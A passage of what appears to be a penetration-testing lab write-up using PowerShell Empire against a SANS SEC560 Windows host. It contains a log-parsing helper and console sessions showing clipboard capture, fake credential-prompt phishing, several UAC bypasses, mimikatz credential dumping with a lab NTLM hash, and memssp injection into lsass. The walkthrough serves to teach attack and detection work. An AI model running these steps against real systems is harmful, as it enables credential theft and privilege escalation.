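    completed_at: Optional[datetime] = None

    @property
    def latency_s(self):
        """Seconds between tasking and result; None if no result block yet."""
        if self.completed_at is None:
            return None
        return (self.completed_at - self.tasked_at).total_seconds()

def parse_blocks(text):
    """Split the log into timestamped blocks; text before the first header is ignored."""
    blocks, cur_ts, cur_lines = [], None, []
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            if cur_ts is not None:
                blocks.append(Block(cur_ts, "\n".join(cur_lines).strip()))
            cur_ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
            cur_lines = []
        elif cur_ts is not None:
            cur_lines.append(line)
    if cur_ts is not None:
        blocks.append(Block(cur_ts, "\n".join(cur_lines).strip()))
    return blocks

def build_timeline(text):
    """Return (tasks, renames). Each tasking block is paired with the block that
    follows it; renames are kept as (ts, old_name, new_name) so the agent can be
    followed across names."""
    tasks, renames, pending = [], [], None
    for b in parse_blocks(text):
        first = b.text.splitlines()[0] if b.text else ""
        m = TASK_RE.match(first)
        if m:
            pending = Task(b.ts, m.group(1), m.group(2), m.group(3))
            tasks.append(pending)
            continue
        r = RENAME_RE.match(b.text)
        if r:
            renames.append((b.ts, r.group(1), r.group(2)))
            pending = None
            continue
        if pending is not None and pending.result is None:
            pending.result, pending.completed_at = b.text, b.ts
            pending = None
    return tasks, renames

# Constructed sample, assembled from agent.log entries reproduced in the post.
SAMPLE_LOG = """\
2021-11-20 13:43:22 :
[*] Agent renamed from E7ULVTA6 to SANS560WINlowpriv

2021-11-20 13:55:25 :
tasked agent E7ULVTA6 to run command whoami

2021-11-20 13:56:12 :
SEC560STUDENT\\sec560

2021-11-20 15:17:49 :
tasked agent E7ULVTA6 to run module Get-Screenshot

2021-11-20 15:18:30 :
[+] Output saved to ./downloads/SANS560WINlowpriv/Get-Screenshot/SEC560STUDENT_2021-11-20_15-18-30.jpg
"""

if __name__ == "__main__":
    tasks, renames = build_timeline(SAMPLE_LOG)
    for ts, old, new in renames:
        print(f"{ts}  rename {old} -> {new}")
    for t in tasks:
        print(f"{t.tasked_at}  {t.kind} {t.what!r} -> result after {t.latency_s}s: {t.result!r}")
```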

3. Examining the system

With access gained, time to examine the system. First up, whoami.

(Empire: SANS560WINlowpriv) > whoami
[*] Tasked E7ULVTA6 to run Task 1

Looking at the agent.log, I see:

2021-11-20 13:55:25 : 
tasked agent E7ULVTA6 to run command whoami

2021-11-20 13:56:12 : 
SEC560STUDENT\sec560

Looking at process information on the host.

(Empire: SANS560WINlowpriv) > ps
[*] Tasked E7ULVTA6 to run Task 2

Confirming the activity from the agent.log file.

2021-11-20 14:36:14 : 
tasked agent E7ULVTA6 to run command ps

2021-11-20 14:36:26 : 
ProcessName              PID Arch UserName             MemUsage 
-----------              --- ---- --------             -------- 
Idle                       0 x64  N/A                  0.01 MB  
System                     4 x64  N/A                  0.09 MB  
Registry                  88 x64  N/A                  19.02 MB 
svchost                  328 x64  N/A                  45.00 MB 
smss                     332 x64  N/A                  0.91 MB  
svchost                  376 x64  N/A                  8.18 MB  
csrss                    416 x64  N/A                  4.07 MB  
....
dllhost                 4500 x64  SEC560STUDENT\sec560 6.84 MB  
SearchUI                4576 x64  SEC560STUDENT\sec560 16.41 MB 
...

Dropping down to the command shell to see what else we can do.

(Empire: SANS560WINlowpriv) > shell
[*] Exit Shell Menu with Ctrl+C
(SANS560WINlowpriv) C:\Users\sec560\Downloads >

Running the whoami command again, to grab information about groups and the integrity level the process is running with.

(SANS560WINlowpriv) C:\Users\sec560\Downloads > cmd.exe /c "whoami /groups"
GROUP INFORMATION
-----------------

Group Name                                                    Type             SID          Attributes                                        
============================================================= ================ ============ ==================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Group used for deny only                          
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Group used for deny only                          
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory 
...
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level                        Label            S-1-16-8192
(SANS560WINlowpriv) C:\Users\sec560\Downloads >

While the process is not running with administrative rights (the token sits at Medium Mandatory Level and BUILTIN\Administrators is marked "Group used for deny only", the signature of a UAC-filtered token), the user running the process is a member of the Administrators group. This means we can attempt to elevate privileges by taking advantage of something such as bypassuac.

Confirming the users who are part of the administrators group.

(SANS560WINlowpriv) C:\Users\sec560\Downloads > whoami
SEC560STUDENT\sec560

(SANS560WINlowpriv) C:\Users\sec560\Downloads > net localgroup administrators

Looking at the agent.log.

2021-11-20 15:11:55 : 
tasked agent E7ULVTA6 to run command net localgroup administrators

2021-11-20 15:12:29 : 
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
john
sec560
The command completed successfully.

Going back to the Empire environment to perform additional analysis of the host.

Grabbing a screenshot of the system.

2021-11-20 15:17:49 : 
tasked agent E7ULVTA6 to run module Get-Screenshot

2021-11-20 15:18:30 : 
[+] Output saved to ./downloads/SANS560WINlowpriv/Get-Screenshot/SEC560STUDENT_2021-11-20_15-18-30.jpg

Opening the screenshot, we see:

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# xdg-open /var/lib/powershell-empire/downloads/SANS560WINlowpriv/Get-Screenshot/SEC560STUDENT_2021-11-20_15-18-30.jpg &

Powershell Empire Screenshot

Grabbing a screenshot a second time, this time by loading the module explicitly with usemodule rather than the shortcut.

(Empire: agents) > usemodule powershell/collection/screenshot

┌Record Options────┬──────────┬───────────────────────────────────┐
│ Name  │ Value    │ Required │ Description                       │
├───────┼──────────┼──────────┼───────────────────────────────────┤
│ Agent │ E7ULVTA6 │ True     │ Agent to run module on.           │
├───────┼──────────┼──────────┼───────────────────────────────────┤
│ Ratio │ 80       │ False    │ JPEG Compression ratio: 1 to 100. │
└───────┴──────────┴──────────┴───────────────────────────────────┘

(Empire: usemodule/powershell/collection/screenshot) > execute
[*] Tasked E7ULVTA6 to run Task 8
[+] Output saved to ./downloads/SANS560WINlowpriv/Get-Screenshot/SEC560STUDENT_2021-11-20_16-10-26.jpg
(Empire: usemodule/powershell/collection/screenshot) >

Trying to run mimikatz

(Empire: SANS560WINlowpriv) > mimikatz
[!] Error: module needs to run in an elevated context

Oops!! Looks like we definitely need those elevated privileges. Before going after them, let's see what else can be learned about the system from the low privilege agent.

Grabbing contents from the clipboard. The clipboard_monitor module polls the clipboard every PollInterval seconds and reports any text that changes; CollectionLimit (in minutes) stops the job after a fixed time instead of collecting indefinitely.

(Empire: SANS560WINlowpriv) > usemodule powershell/collection/clipboard_monitor
[*] Set Agent to SANS560WINlowpriv


┌Record Options───┬───────────────────┬──────────┬─────────────────────────────────────┐
│ Name            │ Value             │ Required │ Description                         │
├─────────────────┼───────────────────┼──────────┼─────────────────────────────────────┤
│ Agent           │ SANS560WINlowpriv │ True     │ Agent to run module on.             │
├─────────────────┼───────────────────┼──────────┼─────────────────────────────────────┤
│ CollectionLimit │                   │ False    │ Specifies the interval in minutes   │
│                 │                   │          │ to capture clipboard text. Defaults │
│                 │                   │          │ to indefinite collection.           │
├─────────────────┼───────────────────┼──────────┼─────────────────────────────────────┤
│ PollInterval    │ 15                │ True     │ Interval (in seconds) to check the  │
│                 │                   │          │ clipboard for changes, defaults to  │
│                 │                   │          │ 15 seconds.                         │
└─────────────────┴───────────────────┴──────────┴─────────────────────────────────────┘

(Empire: usemodule/powershell/collection/clipboard_monitor) > set CollectionLimit 5
[*] Set CollectionLimit to 5
(Empire: usemodule/powershell/collection/clipboard_monitor) > execute
[*] Tasked SANS560WINlowpriv to run Task 9


Looking at the agent.log, we see what the user had copied to the clipboard during the collection window.

2021-11-20 16:14:27 : 
Job started: XGSUZT

2021-11-20 16:15:28 : 
=== Get-ClipboardContents Starting at 20/11/2021:21:18:02:34 ===

=== 20/11/2021:21:18:02:58 ===

credentials for securitynik.local - securitynik:Password1
credentials for securitynik mail  - securitynik:Password1Mail
credentials for securitynik cloud  - securitynik:Password1Cloud

Running PowerUp's checks for possible privilege escalation vectors.

(Empire: SANS560WINlowpriv) > usemodule powershell/privesc/powerup/allchecks
[*] Set Agent to SANS560WINlowpriv

┌Record Options──┬───────────────────┬──────────┬─────────────────────────────────────┐
│ Name           │ Value             │ Required │ Description                         │
├────────────────┼───────────────────┼──────────┼─────────────────────────────────────┤
│ Agent          │ SANS560WINlowpriv │ True     │ Agent to run module on.             │
├────────────────┼───────────────────┼──────────┼─────────────────────────────────────┤
│ OutputFunction │ Out-String        │ False    │ PowerShell's output function to use │
│                │                   │          │ ("Out-String", "ConvertTo-Json",    │
│                │                   │          │ "ConvertTo-Csv", "ConvertTo-Html",  │
│                │                   │          │ "ConvertTo-Xml").                   │
└────────────────┴───────────────────┴──────────┴─────────────────────────────────────┘

(Empire: usemodule/powershell/privesc/powerup/allchecks) > execute
[*] Tasked SANS560WINlowpriv to run Task 10

Looking at the agent.log.

2021-11-20 16:29:34 : 
Job started: NHVZSR

2021-11-20 16:30:34 : 

[*] Running Invoke-AllChecks


[*] Checking if user is in a local group with administrative privileges...
[+] User is in a local group that grants administrative privileges!
[+] Run a BypassUAC attack to elevate privileges to admin.

...
[*] Checking service executable and argument permissions...
...
[*] Checking service permissions...
[*] Checking %PATH% for potentially hijackable DLL locations...
...
[*] Checking for AlwaysInstallElevated registry key...
[*] Checking for Autologon credentials in registry...
[*] Checking for modifidable registry autoruns and configs...
[*] Checking for modifiable schtask files/configs...
[*] Checking for unattended install files...
[*] Checking for encrypted web.config strings...
[*] Checking for encrypted application pool and virtual directory passwords...
[*] Checking for plaintext passwords in McAfee SiteList.xml files....
[*] Checking for cached Group Policy Preferences .xml files....

Invoke-AllChecks completed

Since the recommendation above is to run a UAC Bypass attack, let's follow that guidance.

4. Elevate Privileges

There are a few different ways to elevate our privileges. First, let's confirm our current privileges.

(Empire: usemodule/powershell/privesc/powerup/allchecks) > agents

┌Agents──────────────────┬────────────┬─────────────┬──────────────────────┬────────────┬──────┬────────┬─────────────────────────┬──────────┐
│ ID │ Name              │ Language   │ Internal IP │ Username             │ Process    │ PID  │ Delay  │ Last Seen               │ Listener │
├────┼───────────────────┼────────────┼─────────────┼──────────────────────┼────────────┼──────┼────────┼─────────────────────────┼──────────┤
│ 1  │ SANS560WINlowpriv │ powershell │ 10.0.0.110  │ SEC560STUDENT\sec560 │ powershell │ 3600 │ 60/0.0 │ 2021-11-20 16:34:35 EST │ http     │                                                                                    
│    │                   │            │             │                      │            │      │        │ (26 seconds ago)        │          │                                                                                    
└────┴───────────────────┴────────────┴─────────────┴──────────────────────┴────────────┴──────┴────────┴─────────────────────────┴──────────┘

Notice that the agent name carries no asterisk (*) yet. Once an agent is running with elevated privileges, Empire appends an asterisk to its name, which is how we will tell the two apart.


First, let's use the toasted module (Invoke-CredentialPhisher), which pops a fake toast notification and credential prompt to "ask" the user for their credentials. This is credential phishing rather than a real privilege escalation: it does not change the agent's token, but the password it collects can be reused later.

(Empire: SANS560WINlowpriv) > usemodule powershell/collection/toasted
[*] Set Agent to SANS560WINlowpriv

(Empire: usemodule/powershell/collection/toasted) >  set CredBoxTitle "SecurityNik is asking you to restart ;-)"
[*] Set CredBoxTitle to SecurityNik is asking you to restart ;-)

(Empire: usemodule/powershell/collection/toasted) > options

┌Record Options──┬───────────────────────────────────┬──────────┬─────────────────────────────────────┐
│ Name           │ Value                             │ Required │ Description                         │
├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Agent          │ SANS560WINlowpriv                 │ True     │ Agent to phish credentials from     │
├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Application    │ System Configuration              │ True     │ Name of the application to claim    │
│                │                                   │          │ launched the prompt (ie. "outlook", │
│                │                                   │          │ "explorer")                         │
├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ CredBoxMessage │ Authentication is required to     │ True     │ Message of the box prompting for    │
│                │ reschedule a system restart       │          │ credentials                         │
├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ CredBoxTitle   │ SecurityNik is asking you to      │ True     │ Title on the box prompting for      │
│                │ restart ;-)                       │          │ credentials                         │
├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ HideProcess    │                                   │ False    │ Switch. True/False to hide the      │
│                │                                   │          │ window of the process we claim      │
│                │                                   │          │ launched the prompt (default =      │
│                │                                   │          │ false)                              │
├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ToastMessage   │ Windows will soon restart to      │ True     │ Message of toast notification box   │
│                │ complete applying recently        │          │                                     │
│                │ installed updates. Use the drop   │          │                                     │
│                │ down below to reschedule the      │          │                                     │
│                │ restart for a later time.         │          │                                     │
├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ToastTitle     │ Windows will restart in 5 minutes │ True     │ Title of toast notification box     │
│                │ to finish installing updates      │          │                                     │
├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ToastType      │ System                            │ True     │ Type of Toast notification          │
│                │                                   │          │ ("System" or "Application")         │
├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ VerifyCreds    │                                   │ False    │ Switch. True/False to verify the    │
│                │                                   │          │ creds a user provides, and prompt   │
│                │                                   │          │ them again until they either click  │
│                │                                   │          │ cancel or enter valid creds         │
│                │                                   │          │ (default = false)                   │
└────────────────┴───────────────────────────────────┴──────────┴─────────────────────────────────────┘

Time to execute ...

(Empire: usemodule/powershell/collection/toasted) > execute
[*] Tasked SANS560WINlowpriv to run Task 11

In the first instance, I was a bit too slow to click and thus got the following message:

2021-11-20 16:39:07 : 
tasked agent SANS560WINlowpriv to run module Invoke-CredentialPhisher

2021-11-20 16:40:22 : 
[-] User did not click on notification

I then ran execute again and this time got:

(Image: Empire toasted credential prompt)

Looking at the agent.log, we now see the credentials. Because VerifyCreds was left at its default of false, the module tags them [Not-verified]: it reports whatever the user typed without checking it against the system, so a typo or a deliberately wrong password would be logged just the same.

2021-11-20 16:44:37 : 
[+] Phished credentials [Not-verified]: SEC560STUDENT/securitynik@securitynik.local Testing1

At this point, we could reuse those credentials elsewhere. Let's instead elevate privileges through a UAC bypass, as PowerUp recommended.

(Empire: SANS560WINlowpriv) > usemodule powershell/privesc/bypassuac
[*] Set Agent to SANS560WINlowpriv

(Empire: usemodule/powershell/privesc/bypassuac) > set UserAgent SecurityNik-AUCBypass-User-Agent
[*] Set UserAgent to SecurityNik-AUCBypass-User-Agent

(Empire: usemodule/powershell/privesc/bypassuac) > set Listener http
[*] Set Listener to http

Reviewing the configuration.

(Empire: usemodule/powershell/privesc/bypassuac) > options

┌Record Options────┬──────────────────────────────────┬──────────┬─────────────────────────────────────┐
│ Name             │ Value                            │ Required │ Description                         │
├──────────────────┼──────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Agent            │ SANS560WINlowpriv                │ True     │ Agent to run module on.             │
├──────────────────┼──────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Bypasses         │ mattifestation etw               │ False    │ Bypasses as a space separated list  │
│                  │                                  │          │ to be prepended to the launcher.    │
├──────────────────┼──────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Listener         │ http                             │ True     │ Listener to use.                    │
├──────────────────┼──────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Obfuscate        │ False                            │ False    │ Switch. Obfuscate the launcher      │
│                  │                                  │          │ powershell code, uses the           │
│                  │                                  │          │ ObfuscateCommand for obfuscation    │
│                  │                                  │          │ types. For powershell only.         │
├──────────────────┼──────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ObfuscateCommand │ Token\All\1                      │ False    │ The Invoke-Obfuscation command to   │
│                  │                                  │          │ use. Only used if Obfuscate switch  │
│                  │                                  │          │ is True. For powershell only.       │
├──────────────────┼──────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Proxy            │ default                          │ False    │ Proxy to use for request (default,  │
│                  │                                  │          │ none, or other).                    │
├──────────────────┼──────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ProxyCreds       │ default                          │ False    │ Proxy credentials                   │
│                  │                                  │          │ ([domain\]username:password) to use │
│                  │                                  │          │ for request (default, none, or      │
│                  │                                  │          │ other).                             │
├──────────────────┼──────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ UserAgent        │ SecurityNik-AUCBypass-User-Agent │ False    │ User-agent string to use for the    │
│                  │                                  │          │ staging request (default, none, or  │
│                  │                                  │          │ other).                             │
└──────────────────┴──────────────────────────────────┴──────────┴─────────────────────────────────────┘

Executing the command

(Empire: usemodule/powershell/privesc/bypassuac) > execute
[*] Tasked SANS560WINlowpriv to run Task 13

Once this was run successfully, a new agent got registered.

[+] New agent 8XW5324B checked in
[*] Sending agent (stage 2) to 8XW5324B at 10.0.0.110

Looking at the agents again, we see.

(Empire: usemodule/powershell/privesc/bypassuac) > agents

┌Agents──────────────────┬────────────┬─────────────┬──────────────────────┬────────────┬──────┬────────┬─────────────────────────┬──────────┐
│ ID │ Name              │ Language   │ Internal IP │ Username             │ Process    │ PID  │ Delay  │ Last Seen               │ Listener │
├────┼───────────────────┼────────────┼─────────────┼──────────────────────┼────────────┼──────┼────────┼─────────────────────────┼──────────┤
│ 1  │ SANS560WINlowpriv │ powershell │ 10.0.0.110  │ SEC560STUDENT\sec560 │ powershell │ 3600 │ 60/0.0 │ 2021-11-20 17:05:45 EST │ http     │                                                                                    
│    │                   │            │             │                      │            │      │        │ (38 seconds ago)        │          │                                                                                    
├────┼───────────────────┼────────────┼─────────────┼──────────────────────┼────────────┼──────┼────────┼─────────────────────────┼──────────┤
│ 2  │ 8XW5324B*         │ powershell │ 10.0.0.110  │ SEC560STUDENT\sec560 │ powershell │ 4356 │ 60/0.0 │ 2021-11-20 17:05:58 EST │ http     │                                                                                    
│    │                   │            │             │                      │            │      │        │ (25 seconds ago)        │          │                                                                                    
└────┴───────────────────┴────────────┴─────────────┴──────────────────────┴────────────┴──────┴────────┴─────────────────────────┴──────────┘

Notice that the agent with ID 2 has an asterisk (*) next to its name, which means it is running with high privileges. Same user (SEC560STUDENT\sec560), same host, but a new process (PID 4356) holding the user's full administrator token instead of the UAC filtered one. Let's rename this agent and run the agents command again.

(Empire: agents) > rename 8XW5324B SANS560HighPrivBypassUAC
(Empire: agents) > agents

┌Agents──────────────────────────┬────────────┬─────────────┬──────────────────────┬────────────┬──────┬────────┬─────────────────────────┬──────────┐
│ ID │ Name                      │ Language   │ Internal IP │ Username             │ Process    │ PID  │ Delay  │ Last Seen               │ Listener │
├────┼───────────────────────────┼────────────┼─────────────┼──────────────────────┼────────────┼──────┼────────┼─────────────────────────┼──────────┤
│ 1  │ SANS560WINlowpriv         │ powershell │ 10.0.0.110  │ SEC560STUDENT\sec560 │ powershell │ 3600 │ 60/0.0 │ 2021-11-20 17:07:45 EST │ http     │
│    │                           │            │             │                      │            │      │        │ (22 seconds ago)        │          │
├────┼───────────────────────────┼────────────┼─────────────┼──────────────────────┼────────────┼──────┼────────┼─────────────────────────┼──────────┤
│ 2  │ SANS560HighPrivBypassUAC* │ powershell │ 10.0.0.110  │ SEC560STUDENT\sec560 │ powershell │ 4356 │ 60/0.0 │ 2021-11-20 17:07:58 EST │ http     │
│    │                           │            │             │                      │            │      │        │ (9 seconds ago)         │          │
└────┴───────────────────────────┴────────────┴─────────────┴──────────────────────┴────────────┴──────┴────────┴─────────────────────────┴──────────┘

Trying to elevate privileges with the ask module. Rather than bypassing UAC, this one launches a new stager in a way that triggers the normal UAC consent prompt and relies on the user clicking Yes, so it is noisier on screen than bypassuac.

(Empire: agents) > interact SANS560WINlowpriv
[*] Task 13 results received
Job started: G1SLA9
(Empire: SANS560WINlowpriv) > usemodule powershell/privesc/ask
[*] Set Agent to SANS560WINlowpriv


(Empire: usemodule/powershell/privesc/ask) >  set UserAgent SecurityNik-UAC-ASK
[*] Set UserAgent to SecurityNik-UAC-ASK

(Empire: usemodule/powershell/privesc/ask) > set Listener http
[*] Set Listener to http


(Empire: usemodule/powershell/privesc/ask) > options

┌Record Options────┬─────────────────────┬──────────┬─────────────────────────────────────┐
│ Name             │ Value               │ Required │ Description                         │
├──────────────────┼─────────────────────┼──────────┼─────────────────────────────────────┤
│ Agent            │ SANS560WINlowpriv   │ True     │ Agent to run module on.             │
├──────────────────┼─────────────────────┼──────────┼─────────────────────────────────────┤
│ Bypasses         │ mattifestation etw  │ False    │ Bypasses as a space separated list  │
│                  │                     │          │ to be prepended to the launcher.    │
├──────────────────┼─────────────────────┼──────────┼─────────────────────────────────────┤
│ Listener         │ http                │ True     │ Listener to use.                    │
├──────────────────┼─────────────────────┼──────────┼─────────────────────────────────────┤
│ Obfuscate        │ False               │ False    │ Switch. Obfuscate the launcher      │
│                  │                     │          │ powershell code, uses the           │
│                  │                     │          │ ObfuscateCommand for obfuscation    │
│                  │                     │          │ types. For powershell only.         │
├──────────────────┼─────────────────────┼──────────┼─────────────────────────────────────┤
│ ObfuscateCommand │ Token\All\1         │ False    │ The Invoke-Obfuscation command to   │
│                  │                     │          │ use. Only used if Obfuscate switch  │
│                  │                     │          │ is True. For powershell only.       │
├──────────────────┼─────────────────────┼──────────┼─────────────────────────────────────┤
│ Proxy            │ default             │ False    │ Proxy to use for request (default,  │
│                  │                     │          │ none, or other).                    │
├──────────────────┼─────────────────────┼──────────┼─────────────────────────────────────┤
│ ProxyCreds       │ default             │ False    │ Proxy credentials                   │
│                  │                     │          │ ([domain\]username:password) to use │
│                  │                     │          │ for request (default, none, or      │
│                  │                     │          │ other).                             │
├──────────────────┼─────────────────────┼──────────┼─────────────────────────────────────┤
│ UserAgent        │ SecurityNik-UAC-ASK │ False    │ User-agent string to use for the    │
│                  │                     │          │ staging request (default, none, or  │
│                  │                     │          │ other).                             │
└──────────────────┴─────────────────────┴──────────┴─────────────────────────────────────┘

Executing the code

(Empire: usemodule/powershell/privesc/ask) > execute
[*] Tasked SANS560WINlowpriv to run Task 14

Once again a new agent got registered.

[+] New agent L318PM2Z checked in
[*] Sending agent (stage 2) to L318PM2Z at 10.0.0.110

Giving it a meaningful name

(Empire: usemodule/powershell/privesc/ask) > agents
(Empire: agents) > rename L318PM2Z SANS560UACAskHighPriv

(Empire: agents) > interact SANS560WINlowpriv
[*] Task 14 results received
[*] Successfully elevated!

Trying one more privilege escalation technique.

(Empire: SANS560WINlowpriv) > usemodule powershell/privesc/bypassuac_eventvwr
[*] Set Agent to SANS560WINlowpriv

(Empire: usemodule/powershell/privesc/bypassuac_eventvwr) > set UserAgent SecurityNik-EventVwr-UAC-Bypass
[*] Set UserAgent to SecurityNik-EventVwr-UAC-Bypass

(Empire: usemodule/powershell/privesc/bypassuac_eventvwr) > set Listener http
[*] Set Listener to http

(Empire: usemodule/powershell/privesc/bypassuac_eventvwr) > options

┌Record Options────┬─────────────────────────────────┬──────────┬─────────────────────────────────────┐
│ Name             │ Value                           │ Required │ Description                         │
├──────────────────┼─────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Agent            │ SANS560WINlowpriv               │ True     │ Agent to run module on.             │
├──────────────────┼─────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Bypasses         │ mattifestation etw              │ False    │ Bypasses as a space separated list  │
│                  │                                 │          │ to be prepended to the launcher.    │
├──────────────────┼─────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Listener         │ http                            │ True     │ Listener to use.                    │
├──────────────────┼─────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Obfuscate        │ False                           │ False    │ Switch. Obfuscate the launcher      │
│                  │                                 │          │ powershell code, uses the           │
│                  │                                 │          │ ObfuscateCommand for obfuscation    │
│                  │                                 │          │ types. For powershell only.         │
├──────────────────┼─────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ObfuscateCommand │ Token\All\1                     │ False    │ The Invoke-Obfuscation command to   │
│                  │                                 │          │ use. Only used if Obfuscate switch  │
│                  │                                 │          │ is True. For powershell only.       │
├──────────────────┼─────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Proxy            │ default                         │ False    │ Proxy to use for request (default,  │
│                  │                                 │          │ none, or other).                    │
├──────────────────┼─────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ProxyCreds       │ default                         │ False    │ Proxy credentials                   │
│                  │                                 │          │ ([domain\]username:password) to use │
│                  │                                 │          │ for request (default, none, or      │
│                  │                                 │          │ other).                             │
├──────────────────┼─────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ UserAgent        │ SecurityNik-EventVwr-UAC-Bypass │ False    │ User-agent string to use for the    │
│                  │                                 │          │ staging request (default, none, or  │
│                  │                                 │          │ other).                             │
└──────────────────┴─────────────────────────────────┴──────────┴─────────────────────────────────────┘

[*] Tasked SANS560WINlowpriv to run Task 15
(Empire: usemodule/powershell/privesc/bypassuac_eventvwr) >

While I saw entries in the log file and Event Viewer opening up, this did not give me elevated privileges. 

I then tried the WScript bypass. This reported the host was not vulnerable.

(Empire: SANS560WINlowpriv) > usemodule powershell/privesc/bypassuac_wscript
[*] Set Agent to SANS560WINlowpriv

2021-11-20 18:45:08 : 
[!] WARNING: Target Not Vulnerable

Now that we have at least two privileged agents, let's go and get some more credentials.


5. Gaining (more) credentials

With privileges elevated, time to pillage credentials.

The earlier attempt to execute mimikatz failed. Trying it once again, still from the low privilege agent.

(Empire: SANS560WINlowpriv) > mimikatz
[!] Error: module needs to run in an elevated context

Oops!!! Looks like we need to switch to one of the elevated agents. Interacting with a high privilege agent.

(Empire: agents) > interact SANS560HighPrivBypassUAC
(Empire: SANS560HighPrivBypassUAC) >

Running mimikatz once again.

(Empire: SANS560HighPrivBypassUAC) > mimikatz
[*] Tasked SANS560HighPrivBypassUAC to run Task 1

Now that is progress. Looking at the agent log.

2021-11-20 18:49:54 : 
tasked agent 8XW5324B to run module Invoke-Mimikatz DumpCreds

2021-11-20 18:50:37 : 
Job started: B61KRZ

2021-11-20 18:51:38 : 
Hostname: Sec560Student / S-1-5-21-2977773840-2930198165-1551093962

  .#####.   mimikatz 2.2.0 (x64) #19041 Jun  9 2021 18:55:28
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )                                                 
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz                                                                  
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com ) 
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
                                                                                                                         
mimikatz(powershell) # sekurlsa::logonpasswords
Authentication Id : 0 ; 3548381 (00000000:003624dd) 
Session           : Service from 0 
User Name         : DefaultAppPool  
Domain            : IIS APPPOOL 
Logon Server      : (null)    
Logon Time        : 11/20/2021 5:55:46 PM                                                                                
SID               : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
        msv :
        tspkg :
        wdigest :
         * Username : SEC560STUDENT$
         * Domain   : SEC560
         * Password : (null)
        kerberos :
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 458925 (00000000:000700ad)
Session           : Interactive from 1
User Name         : sec560
Domain            : SEC560STUDENT
Logon Server      : SEC560STUDENT
Logon Time        : 11/20/2021 4:54:39 PM
SID               : S-1-5-21-2977773840-2930198165-1551093962-1202
        msv :
         [00000003] Primary
         * Username : sec560
         * Domain   : SEC560STUDENT
         * NTLM     : 7abdbb1631d1674637aa354c4b4dd273
         * SHA1     : 29282a5203a2e5444ef3053f6ba4943bbb0e3fc4
        tspkg :
        wdigest :
         * Username : sec560
         * Domain   : SEC560STUDENT
         * Password : (null)
        kerberos :
         * Username : sec560
         * Domain   : SEC560STUDENT
         * Password : (null)
        ssp :
        credman :
        cloudap :

...

mimikatz(powershell) # exit
Bye!

Looking at the credentials Empire recorded from that output. Note what mimikatz returned above: wdigest and kerberos show Password : (null), because on this Windows 10 build LSASS no longer keeps those plaintext secrets in memory by default. What we do get is the NTLM (and SHA1) hash for sec560 from the msv provider, which is enough for pass-the-hash, and that hash is what Empire stores.

(Empire: SANS560HighPrivBypassUAC) > credentials

┌Credentials────┬───────────────┬──────────┬───────────────┬──────────────────────────────────┬─────┬─────────────────────────────────┬─────────────────────┐
│ ID │ CredType │ Domain        │ UserName │ Host          │ Password/Hash                    │ SID │ OS                              │ Notes               │
├────┼──────────┼───────────────┼──────────┼───────────────┼──────────────────────────────────┼─────┼─────────────────────────────────┼─────────────────────┤
│ 1  │ hash     │ SEC560STUDENT │ sec560   │ Sec560Student │ 7abdbb1631d1674637aa354c4b4dd273 │     │ Microsoft Windows 10 Enterprise │ 2021-11-20 18:51:38 │
└────┴──────────┴───────────────┴──────────┴───────────────┴──────────────────────────────────┴─────┴─────────────────────────────────┴─────────────────────┘

Injecting mimikatz's memssp security support provider into lsass.exe. From that point on, every password LSASS sees (new logons, screen unlocks and the like) is written in clear text to C:\Windows\System32\mimilsa.log on the host. Sessions that were already logged on are not captured retroactively; the user has to authenticate again after the injection.

(Empire: SANS560HighPrivBypassUAC) > usemodule powershell/persistence/misc/memssp
[*] Set Agent to SANS560HighPrivBypassUAC

(Empire: usemodule/powershell/persistence/misc/memssp) > execute
[*] Tasked SANS560HighPrivBypassUAC to run Task 2

Looking at the agent.log.

2021-11-20 19:06:32 : 
tasked agent SANS560HighPrivBypassUAC to run module Invoke-Mimikatz memssp

2021-11-20 19:07:47 : 
Job started: 7YP5T4

2021-11-20 19:08:47 : 
Hostname: Sec560Student / S-1-5-21-2977773840-2930198165-1551093962

  .#####.   mimikatz 2.2.0 (x64) #19041 Jun  9 2021 18:55:28
